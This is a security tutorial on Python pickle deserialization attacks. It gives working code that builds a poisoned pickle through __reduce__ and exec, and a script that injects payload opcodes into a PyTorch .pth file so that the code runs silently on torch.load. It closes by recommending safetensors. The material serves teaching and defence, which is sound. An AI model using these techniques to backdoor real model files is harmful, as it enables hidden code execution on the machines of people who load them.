Python Pickle Poisoning and Backdooring .pth Files
Python's pickle module is powerful for object serialization but poses security risks, as deserializing untrusted files can execute malicious code. This is particularly relevant in machine learning workflows using shared .pth files.
We will be covering both plain pickle examples and PyTorch examples, so let’s begin by checking your PyTorch setup.
If you need to install PyTorch, the process can vary quite a bit depending on your setup, so it is advisable to follow the official PyTorch installation instructions.
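Once PyTorch is installed, a quick check like the following confirms which version you have and whether a GPU is visible (a minimal sketch; the exact output depends on your installation):

```python
import torch

print(torch.__version__)          # installed PyTorch version
print(torch.cuda.is_available())  # True if a CUDA-capable GPU is usable
```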
You can check the pickle data format version and the protocols supported by your Python install like so:
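These are standard attributes exposed by the module itself:

```python
import pickle

print(pickle.format_version)    # version of the pickle data format, e.g. "4.0"
print(pickle.HIGHEST_PROTOCOL)  # highest protocol this interpreter can read and write
print(pickle.DEFAULT_PROTOCOL)  # protocol used by default when pickling
```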
The pickle module is included in Python’s standard library, so there is no need to run an installation command like pip install pickle.
What is Pickle in Python?
The pickle library is Python’s native serialization protocol. It can store complex Python objects as a sequence of “opcodes”, which are a series of executable instructions for rebuilding the serialized object. Pickle will even preserve object references and relationships between objects.
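To make the opcode idea concrete, here is a small illustration using the standard library’s pickletools module to disassemble a pickled dictionary (the object being pickled is an arbitrary placeholder):

```python
import pickle
import pickletools

data = {"name": "example", "values": [1, 2, 3]}
blob = pickle.dumps(data)

# Print the opcode stream the unpickler will execute to rebuild the object
pickletools.dis(blob)
```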
Now, we will explore some hands-on examples of arbitrary code execution exploits in pickle.
Poisoning Python Pickles with Malicious Code
We’re going to create a pickle file containing an instance of a class with arbitrary code that we want to execute during deserialization. Then we will show how an end user might load this pickle file and unknowingly trigger that code.
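A minimal sketch of the attack is shown below; the class name, file name, and printed message are placeholders, and the payload runs the moment pickle.load() is called:

```python
import pickle

class Malicious:
    def __reduce__(self):
        # Whatever callable and arguments are returned here will be
        # invoked by the unpickler when the file is loaded.
        return (exec, ("print('Hello World from a poisoned pickle!')",))

# The attacker writes the poisoned file...
with open("poisoned.pkl", "wb") as f:
    pickle.dump(Malicious(), f)

# ...and the victim loads it, executing the embedded code immediately.
with open("poisoned.pkl", "rb") as f:
    obj = pickle.load(f)
```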
In our example, we just print a simple Hello World. But a malicious sample might include ransomware.
Poisoning PyTorch Model .pth Files with Malicious Code
A similar process of embedding malicious code can be applied to .pth files, since PyTorch’s default save format wraps a pickle stream.
This could be tackled more elegantly, and with more versatility, by using fickling to inject the code directly, but the minimal sketch below shows exactly what enables this vulnerability. The opcodes composing the pickle file are loaded, our potentially malicious opcodes are injected alongside the existing ones, and the end user loading the model sees no difference in the functionality of the loaded model.
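The following is one way to sketch that idea. It assumes a recent PyTorch where torch.save() produces a zip archive containing a data.pkl pickle stream, and where torch.load() is called with weights_only=False (older releases behave this way by default). For simplicity, this version splices the payload opcodes in front of the existing stream rather than parsing and reordering it; the model, file names, and printed message are placeholders:

```python
import pickle
import zipfile

import torch
import torch.nn as nn

# A small stand-in model; any nn.Module works the same way.
class TinyNet(nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(4, 2)

torch.save(TinyNet().state_dict(), "model.pth")

# Payload whose __reduce__ makes the unpickler call exec() at load time.
class Payload:
    def __reduce__(self):
        return (exec, ("print('Hello World from a poisoned .pth!')",))

# Serialize the payload with protocol 2 (no framing), drop its trailing
# STOP opcode (b'.'), and append POP (b'0') so the payload's return value
# is discarded before the original opcodes run.
payload = pickle.dumps(Payload(), protocol=2)[:-1] + b"0"

# The .pth file is a zip archive; the pickle stream lives in the entry
# ending in data.pkl. Rewrite the archive with our opcodes prepended.
with zipfile.ZipFile("model.pth", "r") as zin, \
        zipfile.ZipFile("model_poisoned.pth", "w", zipfile.ZIP_STORED) as zout:
    for item in zin.infolist():
        data = zin.read(item.filename)
        if item.filename.endswith("data.pkl"):
            data = payload + data
        zout.writestr(item, data)

# The victim loads the poisoned file: the payload executes, and the
# original state_dict is still returned, so nothing looks amiss.
state = torch.load("model_poisoned.pth", weights_only=False)
```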
Sharing model weights with Safetensors
Preferably, neural network weights would be shared in the safetensors format to begin with. We can modify our example above to demonstrate one way of exporting to this format in PyTorch.
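Here is one way to do it, as a minimal sketch assuming the safetensors package is installed (pip install safetensors) and reusing a small placeholder model:

```python
import torch.nn as nn
from safetensors.torch import load_file, save_file

class TinyNet(nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(4, 2)

model = TinyNet()

# Export only the tensors: no Python objects, no pickle opcodes to abuse.
save_file(model.state_dict(), "model.safetensors")

# Loading returns a plain dict of tensors that is applied to the
# architecture already defined in code.
fresh = TinyNet()
fresh.load_state_dict(load_file("model.safetensors"))
```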
The resulting safetensors file contains the corresponding weights, which can be paired with the architecture already defined in code to fully load the model. However, many models, especially older ones, have not adopted this workflow. Pickle files are still widely distributed, and the pickle serialization format is still the default when saving neural networks trained in PyTorch.
Other Exploitations of Object Deserialization
Neural network weights are not the only data stored in object serialization formats like pickle. Entire datasets are often also stored as pickle files, and in the R programming language datasets are often stored as RDS files, for example.
It is also possible to embed malicious code directly into the tensors – the model weights themselves – by encoding malicious code in such small perturbations to the weights that the impact on the model’s accuracy is minimal. This process is called tensor steganography. This can be paired with pickle deserialization exploits to produce an especially stealthy attack vector: it may appear that pickle is simply deserializing a tensor when in reality it is also reconstructing malicious code in memory for execution. This still requires exploiting the pickle format's vulnerability, though – safetensors would not reconstruct and execute the embedded malicious code in memory.
Generative AI workflows can also include files for customizing and extending the abilities of a base model: users will often find themselves downloading LoRAs, ControlNets, IP-Adapter variants, or even Textual Inversion checkpoints. The same general principles discussed here apply to these types of files. LoRAs are commonly shared in the safetensors format, but for the others it is less common, so be careful when downloading files that were serialized using pickle.
Additional Hands-on Practice
Snyk offers a CTF (Capture the Flag) event that relies on this exploit and teaches you how to exploit vulnerabilities related to Python pickle. The Python exploit lab is called Sauerkraut and is covered by John Hammond here.
To learn more about Python application security and vulnerabilities such as Code Injection, XPath injection, and others you’re highly encouraged to visit Snyk Learn’s Python developer security lessons.